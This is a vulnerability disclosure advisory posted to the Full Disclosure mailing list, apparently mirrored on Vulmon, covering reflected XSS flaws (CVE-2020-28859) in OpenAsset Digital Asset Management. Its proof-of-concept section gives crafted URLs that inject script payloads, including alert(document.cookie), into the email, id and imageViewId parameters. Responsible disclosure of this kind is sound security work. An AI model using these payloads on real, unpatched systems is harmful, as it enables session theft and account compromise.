Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Reflected cross-site scripting (XSS) in OpenAsset Digital Asset Management 11.2.1/12.0.19 disclosure

Related Vulnerabilities: CVE-2020-28859  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="19"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#20">By Date</a>
<a href="21"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="19"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#20">By Thread</a>
<a href="21"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">Reflected cross-site scripting (XSS) in OpenAsset Digital Asset Management 11.2.1/12.0.19 disclosure</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: Jack Misiura via Fulldisclosure &lt;fulldisclosure () seclists org&gt;


<em>Date</em>: Thu, 10 Dec 2020 07:59:49 +0000


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">Title: Reflected cross-site scripting (XSS)

 

Product: OpenAsset Digital Asset Management by OpenAsset

 

Vendor Homepage: <a rel="nofollow" href="https://www.openasset.com/">https://www.openasset.com/</a>

 

Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)

 

Fixed Version: 12.0.22 (Cloud) 11.4.10 (On-premise)

 

CVE Number: CVE-2020-28859

 

Author: Jack Misiura from The Missing Link 

 

Website: <a rel="nofollow" href="https://www.themissinglink.com.au">https://www.themissinglink.com.au</a>

 

Timeline:

 

2020-11-14 Disclosed to Vendor

2020-12-04 Vendor releases final patches

2020-12-10 Publication

 

1. Vulnerability Description

 

Multiple reflected cross-site scripting (XSS) vulnerabilities in the OpenAsset Digital Asset Management software allows 
remote attackers to inject arbitrary JavaScript or HTML via:

* Account recovery/password reset page through the email parameter

* Saved search request, through the id parameter

* Search result request, through both the imageViewId and lpFilterInputId parameters

 

2. PoC

 

Account recovery:

<a rel="nofollow" href="https://example.com/Page/StartAccountRecovery?ok=1">https://example.com/Page/StartAccountRecovery?ok=1</a> 
&lt;<a rel="nofollow" href="https://example.com/Page/StartAccountRecovery?ok=1&amp;email=test%40test%3cscript%3ealert">https://example.com/Page/StartAccountRecovery?ok=1&amp;email=test%40test%3cscript%3ealert</a>(document.cookie)%3c%2Fscript%3e.com&gt;
 &amp;email=test%40test&lt;script&gt;alert(document.cookie)&lt;%2Fscript&gt;.com

 

Saved search request:

<a rel="nofollow" href="https://example.com/AJAXPage/SavedSearch?id=167826">https://example.com/AJAXPage/SavedSearch?id=167826</a> 
&lt;<a rel="nofollow" href="https://example.com/AJAXPage/SavedSearch?id=167826%22&amp;apos">https://example.com/AJAXPage/SavedSearch?id=167826%22&amp;apos</a>;)%3b%7d%3b%7d%5d%7d)%3b%3c/script%3e%3cscript%3ealert(%22Reflected%20XSS!%22)%3b%3c/script&gt;
 "')%3b}%3b}]})%3b&lt;/script&gt;&lt;script&gt;alert("Reflected%20XSS!")%3b&lt;/script&gt;

"');}}}]});alert(123);

 

Search result request:

<a rel="nofollow" href="https://example.com/AJAXPage/SearchResults?imageViewId=A%27%22%3e%3cscript">https://example.com/AJAXPage/SearchResults?imageViewId=A%27%22%3e%3cscript</a> 
&lt;<a rel="nofollow" href="https://example.com/AJAXPage/SearchResults?imageViewId=A%27%22%3e%3cscript%3ealert">https://example.com/AJAXPage/SearchResults?imageViewId=A%27%22%3e%3cscript%3ealert</a>(%22more+xss+here%22)%3b%3c/script&gt; 
</pre><blockquote style="border-left: #5555EE solid 0.2em; margin: 0em; padding-left: 0.85em"><pre style="margin: 0em;">alert("more+xss+here")%3b&lt;/script&gt;
</pre></blockquote><pre style="margin: 0em;">
 

3. Solution

 

The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the 
vendor has already updated it.

 

4. Advisory URL

 

<a rel="nofollow" href="https://www.themissinglink.com.au/security-advisories">https://www.themissinglink.com.au/security-advisories</a>

 






Jack Misiura​


Application Security Consultant




a



9‑11 Dickson Avenue


Artarmon


NSW


2064



p


1300 865 865



os


+61 2 8436 8585



w


 &lt;<a rel="nofollow" href="https://www.themissinglink.com.au/">https://www.themissinglink.com.au/</a>&gt; themissinglink.com.au








 



 &lt;<a rel="nofollow" href="https://www.linkedin.com/company/the-missing-link-pty-ltd/">https://www.linkedin.com/company/the-missing-link-pty-ltd/</a>&gt; 

 &lt;<a rel="nofollow" href="https://www.facebook.com/The-Missing-Link-268395013346228/?ref=bookmarks">https://www.facebook.com/The-Missing-Link-268395013346228/?ref=bookmarks</a>&gt; 

 &lt;<a rel="nofollow" href="https://twitter.com/TML_au">https://twitter.com/TML_au</a>&gt; 

 &lt;<a rel="nofollow" href="https://www.youtube.com/channel/UC2kd4mDmBs3SjW4lX3fFHnQ">https://www.youtube.com/channel/UC2kd4mDmBs3SjW4lX3fFHnQ</a>&gt; 

 &lt;<a rel="nofollow" href="https://www.instagram.com/the_missing_link_it/">https://www.instagram.com/the_missing_link_it/</a>&gt; 




 


 
&lt;<a rel="nofollow" href="https://forms.office.com/Pages/ResponsePage.aspx?id=XZw2opTdq0iPe7AFmjygSPnqgoo11WREpgCEhJxsz3FUMUxTOUREUVRDTzBNQ0pKTkFaS1lETEFaSi4u">https://forms.office.com/Pages/ResponsePage.aspx?id=XZw2opTdq0iPe7AFmjygSPnqgoo11WREpgCEhJxsz3FUMUxTOUREUVRDTzBNQ0pKTkFaS1lETEFaSi4u</a>&gt;
 





​CAUTION - This message may contain privileged and confidential information intended only for the use of the addressee 
named above. If you are not the intended recipient of this message you are hereby notified that any use, dissemination, 
distribution or reproduction of this message is prohibited. If you have received this message in error please notify 
The Missing Link immediately. Any views expressed in this message are those of the individual sender and may not 
necessarily reflect the views of The Missing Link.

 

</pre><p><a href="att-20/image001.png"><img src="att-20/image001.png"></a></p>
<p><a href="att-20/image002.png"><img src="att-20/image002.png"></a></p>
<p><a href="att-20/image003.png"><img src="att-20/image003.png"></a></p>
<p><a href="att-20/image004.png"><img src="att-20/image004.png"></a></p>
<p><a href="att-20/image005.png"><img src="att-20/image005.png"></a></p>
<p><a href="att-20/image006.png"><img src="att-20/image006.png"></a></p>
<p><a href="att-20/image007.png"><img src="att-20/image007.png"></a></p>
<p><strong>Attachment:
<a href="att-20/smime_p7s.bin"><tt>smime.p7s</tt></a></strong>

<em>Description:</em> </p>
<pre style="margin: 0em;">
_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="19"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#20">By Date</a>
<a href="21"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="19"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#20">By Thread</a>
<a href="21"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>Reflected cross-site scripting (XSS) in OpenAsset Digital Asset Management 11.2.1/12.0.19 disclosure</strong> <em>Jack Misiura via Fulldisclosure (Dec 11)</em>
</li></ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started